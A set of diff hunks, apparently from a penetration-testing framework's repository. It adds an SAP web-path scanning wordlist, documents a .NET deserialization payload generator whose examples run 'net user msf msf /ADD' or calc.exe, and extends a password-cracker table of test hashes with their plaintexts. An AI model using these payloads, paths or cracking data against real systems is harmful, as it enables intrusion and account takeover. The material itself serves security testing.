+sap/bc/webdynpro/sap/salv_wd_test_table_tol
+sap/bc/webdynpro/sap/salv_wd_test_table_tol2
+sap/bc/webdynpro/sap/salv_wd_test_translation
+sap/bc/webdynpro/sap/sh_adm_smoketest_files
+sap/bc/webdynpro/sap/test_ddic
+sap/bc/webdynpro/sap/wd_analyze_config_appl
+sap/bc/webdynpro/sap/wd_analyze_config_comp
+sap/bc/webdynpro/sap/wd_analyze_config_default
+sap/bc/webdynpro/sap/wd_analyze_config_user
+sap/bc/webdynpro/sap/wd_layout_cnp_light
+sap/bc/webdynpro/sap/wd_personalize_ddic_valuehelp
+sap/bc/webdynpro/sap/wd_tut_alv
+sap/bc/webdynpro/sap/wd_tut_componentdetail
+sap/bc/webdynpro/sap/wd_tut_componentusage
+sap/bc/webdynpro/sap/wd_tut_dialogboxes
+sap/bc/webdynpro/sap/wdhc_application
+sap/bc/webdynpro/sap/wdk_gaf_template
+sap/bc/webdynpro/sap/wdk_oif_template
+sap/bc/webdynpro/sap/wdk_qaf_template
+sap/bc/webdynpro/sap/wdr_inplace_demo1
+sap/bc/webdynpro/sap/wdr_inplace_demo2
+sap/bc/webdynpro/sap/wdr_ovs_test
+sap/bc/webdynpro/sap/wdr_package_srvs
+sap/bc/webdynpro/sap/wdr_popup_to_confirm_test
+sap/bc/webdynpro/sap/wdr_replace_if_wdl
+sap/bc/webdynpro/sap/wdr_test_adobe_pdf_only
+sap/bc/webdynpro/sap/wdr_test_appl_def_vh
+sap/bc/webdynpro/sap/wdr_test_application_api
+sap/bc/webdynpro/sap/wdr_test_bg_blend
+sap/bc/webdynpro/sap/wdr_test_chat
+sap/bc/webdynpro/sap/wdr_test_cmp_usage_group
+sap/bc/webdynpro/sap/wdr_test_cmpusage
+sap/bc/webdynpro/sap/wdr_test_cmpusage4
+sap/bc/webdynpro/sap/wdr_test_config
+sap/bc/webdynpro/sap/wdr_test_config2
+sap/bc/webdynpro/sap/wdr_test_configmain
+sap/bc/webdynpro/sap/wdr_test_context
+sap/bc/webdynpro/sap/wdr_test_dynamic
+sap/bc/webdynpro/sap/wdr_test_enhancements
+sap/bc/webdynpro/sap/wdr_test_exit_plug
+sap/bc/webdynpro/sap/wdr_test_ext_mapping
+sap/bc/webdynpro/sap/wdr_test_extended_path
+sap/bc/webdynpro/sap/wdr_test_gantt
+sap/bc/webdynpro/sap/wdr_test_global_settings
+sap/bc/webdynpro/sap/wdr_test_help
+sap/bc/webdynpro/sap/wdr_test_input
+sap/bc/webdynpro/sap/wdr_test_it05_nopatt
+sap/bc/webdynpro/sap/wdr_test_mailto
+sap/bc/webdynpro/sap/wdr_test_mandatory
+sap/bc/webdynpro/sap/wdr_test_misc
+sap/bc/webdynpro/sap/wdr_test_msg_manager_00
+sap/bc/webdynpro/sap/wdr_test_navigation6
+sap/bc/webdynpro/sap/wdr_test_navigation7
+sap/bc/webdynpro/sap/wdr_test_navigation_00
+sap/bc/webdynpro/sap/wdr_test_ovs2
+sap/bc/webdynpro/sap/wdr_test_p00004
+sap/bc/webdynpro/sap/wdr_test_p00006
+sap/bc/webdynpro/sap/wdr_test_p00007
+sap/bc/webdynpro/sap/wdr_test_p00008
+sap/bc/webdynpro/sap/wdr_test_p00009
+sap/bc/webdynpro/sap/wdr_test_p00010
+sap/bc/webdynpro/sap/wdr_test_p00011
+sap/bc/webdynpro/sap/wdr_test_paddless_window
+sap/bc/webdynpro/sap/wdr_test_pers_imp
+sap/bc/webdynpro/sap/wdr_test_pers_imp_exp
+sap/bc/webdynpro/sap/wdr_test_popup_01
+sap/bc/webdynpro/sap/wdr_test_popup_inplug
+sap/bc/webdynpro/sap/wdr_test_popup_to_confirm
+sap/bc/webdynpro/sap/wdr_test_popups_rt
+sap/bc/webdynpro/sap/wdr_test_popups_rt_00
+sap/bc/webdynpro/sap/wdr_test_select_options
+sap/bc/webdynpro/sap/wdr_test_ui_elements
+sap/bc/webdynpro/sap/wdr_test_ur_browser
+sap/bc/webdynpro/sap/wdr_transport_srvs
+sap/bc/webdynpro/sap/wdt_alv
+sap/bc/webdynpro/sap/wdt_bg_scatter
+sap/bc/webdynpro/sap/wdt_componentdetail
+sap/bc/webdynpro/sap/wdt_componentusage
+sap/bc/webdynpro/sap/wdt_dialogboxes
+sap/bc/webdynpro/sap/wdt_ext_map_reuse
+sap/bc/webdynpro/sap/wdt_flightlist
+sap/bc/webdynpro/sap/wdt_master_detail
+sap/bc/webdynpro/sap/wdt_quiz
+sap/bc/webdynpro/sap/wdt_table
+sap/bc/webdynpro/sap/wdt_tree
+sap/bc/webdynpro/sap/wdt_tree_table_by_key
+sap/bc/webflow
+sap/bc/webflow/
+sap/bc/webflow/demo
+sap/bc/webflow/demo/
+sap/bc/webflow/demo/trareq_update
+sap/bc/webflow/demo/wf_demo_calc_01
+sap/bc/webflow/test
+sap/bc/webflow/test/
+sap/bc/webflow/test/get_data
+sap/bc/webflow/test/inc_async
+sap/bc/webflow/test/inc_sync
+sap/bc/webflow/test/test_datatypes
+sap/bc/webflow/test/test_get_xml
+sap/bc/webflow/test/test_show_xml
+sap/bc/webflow/wshandler
+sap/bc/webrfc
+sap/bc/workflow
+sap/bc/workflow/
+sap/bc/workflow/shortcut
+sap/bc/workflow/workflow_api
+sap/bc/workflow_xml
+sap/bc/xmb
+sap/bc/xml
+sap/bc/xmsmsg
+sap/bc/xrfc
+sap/bc/xrfc_test
+sap/bw
+sap/ca
+sap/ca/att_provide
+sap/crm
+sap/es/cockpit
+sap/es/getdocument
+sap/es/opensearch
+sap/es/opensearch/description
+sap/es/opensearch/list
+sap/es/opensearch/search
+sap/es/redirect
+sap/es/saplink
+sap/es/search
+sap/icm/admin
+sap/meData
+sap/monitoring
+sap/monitoring/
+sap/monitoring/ComponentInfo
+sap/monitoring/SystemInfo
+sap/option
+sap/public
+sap/public/
+sap/public/bc
+sap/public/bc/
+sap/public/bc/NWDEMO_MODEL
+sap/public/bc/NW_ESH_TST_AUTO
+sap/public/bc/icons
+sap/public/bc/icons_rtl
+sap/public/bc/its
+sap/public/bc/its/
+sap/public/bc/its/designs
+sap/public/bc/its/mimes
+sap/public/bc/its/mimes/system/SL/page/hourglass.html
+sap/public/bc/its/mobile/itsmobile00
+sap/public/bc/its/mobile/itsmobile01
+sap/public/bc/its/mobile/rfid
+sap/public/bc/its/mobile/start
+sap/public/bc/its/mobile/test
+sap/public/bc/pictograms
+sap/public/bc/sicf_login_run
+sap/public/bc/trex
+sap/public/bc/ur
+sap/public/bc/wdtracetool
+sap/public/bc/webdynpro
+sap/public/bc/webdynpro/
+sap/public/bc/webdynpro/ViewDesigner
+sap/public/bc/webdynpro/adobeChallenge
+sap/public/bc/webdynpro/adobechallenge
+sap/public/bc/webdynpro/mimes
+sap/public/bc/webdynpro/ssr
+sap/public/bc/webdynpro/viewdesigner
+sap/public/bc/webicons
+sap/public/bc/workflow
+sap/public/bc/workflow/shortcut
+sap/public/bsp
+sap/public/bsp/sap
+sap/public/bsp/sap/
+sap/public/bsp/sap/htmlb
+sap/public/bsp/sap/public
+sap/public/bsp/sap/public/
+sap/public/bsp/sap/public/ISE
+sap/public/bsp/sap/public/bc
+sap/public/bsp/sap/public/faa
+sap/public/bsp/sap/public/graphics
+sap/public/bsp/sap/public/graphics/
+sap/public/bsp/sap/public/graphics/jnet_handler
+sap/public/bsp/sap/public/graphics/mimes
+sap/public/bsp/sap/system
+sap/public/bsp/sap/system_public
+sap/public/icf_check
+sap/public/icf_info
+sap/public/icf_info/
+sap/public/icf_info/icr_groups
+sap/public/icf_info/icr_urlprefix
+sap/public/icf_info/logon_groups
+sap/public/icf_info/urlprefix
+sap/public/icman
+sap/public/info
+sap/public/myssocntl
+sap/public/ping
+sap/wdvd
+sap/webcuif
+sap/webdynpro/sap/hap_main_document
+sap/webdynpro/sap/hap_start_page_powl_ui_ess
+sap/webdynpro/sap/hap_store_page_powl_ui_mss
+sap/webdynpro/sap/hrtmc_employee_profile
+sap/webdynpro/sap/hrtmc_rm_maintenance
+sap/webdynpro/sap/hrtmc_ta_assessment
+sap/webdynpro/sap/hrtmc_ta_dashboard
+sap/webdynpro/sap/wd_analyze_config_user
+sap/xi
+sap/xi/
+sap/xi/adapter_plain
+sap/xi/cache
+sap/xi/cache_gui
+sap/xi/cache_gui_ssl
+sap/xi/cache_ssl
+sap/xi/docu_apperror
+sap/xi/docu_syserror
+sap/xi/engine
+sap/xi/engine_test
+sap/xi/simulation
+sap/xml/
+sap/xml/cwm
+sap/xml/soap
+sap/xml/soap/xmla
+sap/xml/soap/xmla/fault
+sap_java
+sap_java/bc
+sapmc
+sapmc/sapmc.html
+sapse/startsld
+servlet/com.sap.admin.Critical.Actio
+sim/
+sim/config/testdata.jsp
+sim/config/testerror.jsp
+sim/index.html
+sld
+slm
+slmServices/config
+slmServices/config?wsdl
+slmSolManServices/Config1
+socoview
+socoview/flddisplay.asp
+sp
+spml
+sysconfig
+tc.lm.webadmin.endtoend.public.app
+tc/lm/webadmin/clusteradmin
+teched/test
+test30
+top.html
+uddi
+uddiclient
+uddiclient/jsps/index.jsp
+useradmin
+useradmin/index.jsp
+userhome/
+utl
+vscantest
+vscantest/
+webdynpro
+webdynpro/dispatcher
+webdynpro/dispatcher/sap.com/grc~accvwdcomp
+webdynpro/dispatcher/sap.com/grc~aewebquery
+webdynpro/dispatcher/sap.com/grc~ccappcomp
+webdynpro/dispatcher/sap.com/grc~ccxsysbe
+webdynpro/dispatcher/sap.com/grc~ccxsysbehr
+webdynpro/dispatcher/sap.com/grc~ffappcomp
+webdynpro/dispatcher/sap.com/pb/pagebuilder
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
+webdynpro/dispatcher/sap.com/tc~lm~webadmin~mainframe~wd/WebAdminApp
+webdynpro/dispatcher/sap.com/tc~sec~ume~wd~enduser/UmeEnduserApp
+webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
+webdynpro/dispatcher/sap.com/tc~wd~tools
+webdynpro/dispatcher/sap.com/tc~wd~tools/Explorer
+webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
+webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
+webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
+webdynpro/resources/sap.com/
+webdynpro/welcome
+webdynpro/welcome/Welcome.jsp
+wsd2wsdl
+wsnavigator
+wsnavigator/enterwsdl.html
+wsnavigator/jsps/redirect.jsp
+wsnavigator/jsps/sendrequest.jsp
+wsnavigator/jsps/test.jsp
+wssproc/cert
+wssproc/plain
+wssproc/ssl
@@ -60,3 +60,4 @@ paid-memberships-pro
 woocommerce-payments
 file-manager-advanced-shortcode
 royal-elementor-addons
+backup-backup
@@ -32,7 +32,7 @@ exclude:
 # just-the-docs config
 mermaid_enabled: true
 mermaid:
-  version: "9.2.2"
+  version: "10.8.0"
 heading_anchors: true
 aux_links_new_tab: true
 aux_links:
@@ -82,24 +82,41 @@ Generate a .NET deserialization payload that will execute an operating system
 command using the specified gadget chain and formatter.

 Available formatters:
-   * BinaryFormatter
-   * LosFormatter
-   * SoapFormatter
+  * BinaryFormatter
+  * LosFormatter
+  * SoapFormatter

 Available gadget chains:
-   * TextFormattingRunProperties
-   * TypeConfuseDelegate
-   * WindowsIdentity
+  * ClaimsPrincipal
+  * DataSet
+  * DataSetTypeSpoof
+  * ObjectDataProvider
+  * TextFormattingRunProperties
+  * TypeConfuseDelegate
+  * WindowsIdentity

-Example: ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TextFormattingRunProperties
+Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5

-Specific options:
-   -c, --command   <String>         The command to run
-   -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
-   -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
-   -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
-       --list-output-formats        List available output formats, for use with --output
-   -h, --help                       Show this message
+Examples:
+  ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
+  ./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
+    --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
+
+General options:
+    -h, --help                       Show this message
+    -c, --command   <String>         The command to run
+    -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
+    -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
+    -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
+        --list-output-formats        List available output formats, for use with --output
+
+ViewState related options:
+        --viewstate-generator             <String>
+                                     The ViewState generator string to use
+        --viewstate-validation-algorithm  <String>
+                                     The validation algorithm (default: SHA1, see: Available HMAC algorithms)
+        --viewstate-validation-key        <HexString>
+                                     The validationKey from the web.config file
 ```

 The `-g` / `--gadget` option maps to the *gadget_chain* argument for the
@@ -85,6 +85,15 @@ This section will cover the differences between the two crackers.  This is not a
 | NetNTLMv1                   | netntlm                                                | 5500                                                           |
 | NetNTLMv2                   | netntlmv2                                              | 5600                                                           |
 | pbkdf2-sha256               | PBKDF2-HMAC-SHA256                                     | 10900                                                          |
+| Android (Samsung) SHA1      |                                                        | 5800                                                           |
+| Android (non-Samsung) SHA1  |                                                        | 110                                                            |
+| Android MD5                 |                                                        | 10                                                             |
+| xsha                        | xsha                                                   | 122                                                            |
+| xsha512                     | xsha512                                                | 1722                                                           |
+| PBKDF2-HMAC-SHA512          | PBKDF2-HMAC-SHA512                                     | 7100                                                           |
+| PBKDF2-HMAC-SHA1            | PBKDF2-HMAC-SHA1                                       | 12001                                                          |
+| PHPass                      | phpass                                                 | 400                                                            |
+| mediawiki                   | mediawiki                                              | 3711                                                           |

 While Metasploit standardizes with the JtR format, the hashcat [library](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/password_crackers/cracker.rb) includes the `jtr_format_to_hashcat_format` function to translate from jtr to hashcat.

@@ -136,6 +145,8 @@ creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB11
 creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
 creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm
 creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2
+creds add user:mscash-test1 hash:M$test1#64cd29e36a8431a2b111378564a10631 jtr:mscash
+creds add user:mscash2-hashcat hash:$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f jtr:mscash2
 # sql
 creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
 creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
@@ -152,7 +163,20 @@ creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C
 creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
 ## postgres uses username, so we can't override that here
 creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-## other
+# mobile
+creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
+creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
+creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
+# OSX
+creds add user:xsha_hashcat hash:1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 jtr:xsha
+creds add user:pbkdf2_hashcat hash:$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222 jtr:PBKDF2-HMAC-SHA512
+creds add user:xsha512_hashcat hash:648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d jtr:xsha512
+# webapps
+creds add user:mediawiki_hashcat hash:$B$56668501$0ce106caa70af57fd525aeaf80ef2898 jtr:mediawiki
+creds add user:phpass_p_hashcat hash:$P$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
+creds add user:phpass_h_hashcat hash:$H$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
+creds add user:atlassian_hashcat hash:{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa jtr:PBKDF2-HMAC-SHA1
+# other
 creds add user:hmac_password hash:'<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5
 creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6' jtr:dynamic_82
 creds add user:admin hash:'$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU' jtr:pbkdf2-sha256
@@ -160,32 +184,44 @@ creds add user:admin hash:'$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlI

 This data breaks down to the following table:

-|   | Hash Type                            | Username           | Hash                                                                                                                                                                                                                                                                   | Password     | jtr format         | Modules which dump this info                      | Modules which crack this                                  |   |   |   |
-|---|--------------------------------------|--------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|--------------------|---------------------------------------------------|-----------------------------------------------------------|---|---|---|
-|   | DES                                  | des_password       | `rEK1ecacw.7.c`                                                                                                                                                                                                                                                        | password     | des                |                                                   | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |   |   |   |
-|   | MD5                                  | md5_password       | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`                                                                                                                                                                                                                                   | password     | md5                |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
-|   | BSDi                                 | bsdi_password      | `_J9..K0AyUubDrfOgO4s`                                                                                                                                                                                                                                                 | password     | bsdi               |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
-|   | SHA256                               | sha256_password    | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5`                                                                                                                                                                                                              | password     | sha256,crypt       |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
-|   | SHA512                               | sha512_password    | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1`                                                                                                                                                                   | password     | sha512,crypt       |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
-|   | Blowfish                             | blowfish_password  | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe`                                                                                                                                                                                                         | password     | bf                 |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
-|   | Lanman                               | lm_password        | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | lm                 |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
-|   | NTLM                                 | nt_password        | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | nt                 |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
-|   | NetNTLMv1                            | u4-netntlm         | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c`                                                                                                                                   | hashcat      | netntlm            |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
-|   | NetNTLMv2                            | admin              | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030`                                                                                       | hashcat      | netntlmv2          |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
-|   | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05            | auxiliary/scanner/mssql/mssql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql              | auxiliary/scanner/mssql/mssql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12            | auxiliary/scanner/mssql/mssql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql              | auxiliary/scanner/mysql/mysql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1         | auxiliary/scanner/mysql/mysql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle         | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | Oracle                               | SYSTEM             | `9EEDFA0AD26C6D52`                                                                                                                                                                                                                                                     | THALES       | des,oracle         | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | Oracle 11                            | DEMO               | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle    | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | Oracle 11                            | oracle11_epsilon   | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle    | modules/auxiliary/scanner/oracle/oracle_hashdump  | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | Oracle 12                            | oracle12_epsilon   | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B`                                                                | epsilon      | pbkdf2,oracle12c   | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | Postgres                             | example            | `md5be86a79bf2043622d58d5453c47d4860`                                                                                                                                                                                                                                  | password     | raw-md5,postgres   | auxiliary/scanner/postgres/postgres_hashdump      | auxiliary/analyze/crack_databases                         |   |   |   |
-|   | HMAC-MD5                             | hmac_password      | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9`                                                                                                                                                                                                              | password     | hmac-md5           | auxiliary/server/capture/smtp                     | None                                                      |   |   |   |
-|   | SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap        | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6`                                                                                    | TestPass123# | dynamic_82         |                                                   | None                                                      |   |   |   |
-|   | pbkdf2-sha256                        | admin              | `$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU`                                                                                                                                                                             | admin        | PBKDF2-HMAC-SHA256 | exploit/linux/http/apache_superset_cookie_sig_rce | auxiliary/analyze/webapp                                  |   |   |   |
+| Hash Type                            | Username           | Hash                                                                                                                                                                                                                                                                   | Password     | jtr format           | Modules which dump this info                     | Modules which crack this                                  |
+| ------------------------------------ | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | -------------------- | ------------------------------------------------ | --------------------------------------------------------- |
+| -----------                          | ----------         | ------                                                                                                                                                                                                                                                                 | ----------   | ------------         | ------------------------------                   | -------------------------                                 |
+| DES                                  | des_password       | `rEK1ecacw.7.c`                                                                                                                                                                                                                                                        | password     | des                  | post/aix/gather/hashdump                         | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |
+| MD5                                  | md5_password       | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`                                                                                                                                                                                                                                   | password     | md5                  | post/linux/gather/hashdump                       | auxiliary/analyze/crack_linux                             |
+| BSDi                                 | bsdi_password      | `_J9..K0AyUubDrfOgO4s`                                                                                                                                                                                                                                                 | password     | bsdi                 | post/linux/gather/hashdump                       | auxiliary/analyze/crack_linux                             |
+| SHA256                               | sha256_password    | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5`                                                                                                                                                                                                              | password     | sha256,crypt         | post/linux/gather/hashdump                       | auxiliary/analyze/crack_linux                             |
+| SHA512                               | sha512_password    | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1`                                                                                                                                                                   | password     | sha512,crypt         | post/linux/gather/hashdump                       | auxiliary/analyze/crack_linux                             |
+| Blowfish                             | blowfish_password  | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe`                                                                                                                                                                                                         | password     | bf                   | post/linux/gather/hashdump                       | auxiliary/analyze/crack_linux                             |
+| Lanman                               | lm_password        | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | lm                   | post/windows/gather/hashdump                     | auxiliary/analyze/crack_windows                           |
+| NTLM                                 | nt_password        | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | nt                   | post/linux/gather/hashdump                       | auxiliary/analyze/crack_windows                           |
+| NetNTLMv1                            | u4-netntlm         | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c`                                                                                                                                   | hashcat      | netntlm              |                                                  | auxiliary/analyze/crack_windows                           |
+| NetNTLMv2                            | admin              | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030`                                                                                       | hashcat      | netntlmv2            |                                                  | auxiliary/analyze/crack_windows                           |
+| MSCash                               | mscash-test1       | `M$test1#64cd29e36a8431a2b111378564a10631`                                                                                                                                                                                                                             | test1        | mscash               |                                                  | auxiliary/analyze/crack_windows                           |
+| MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
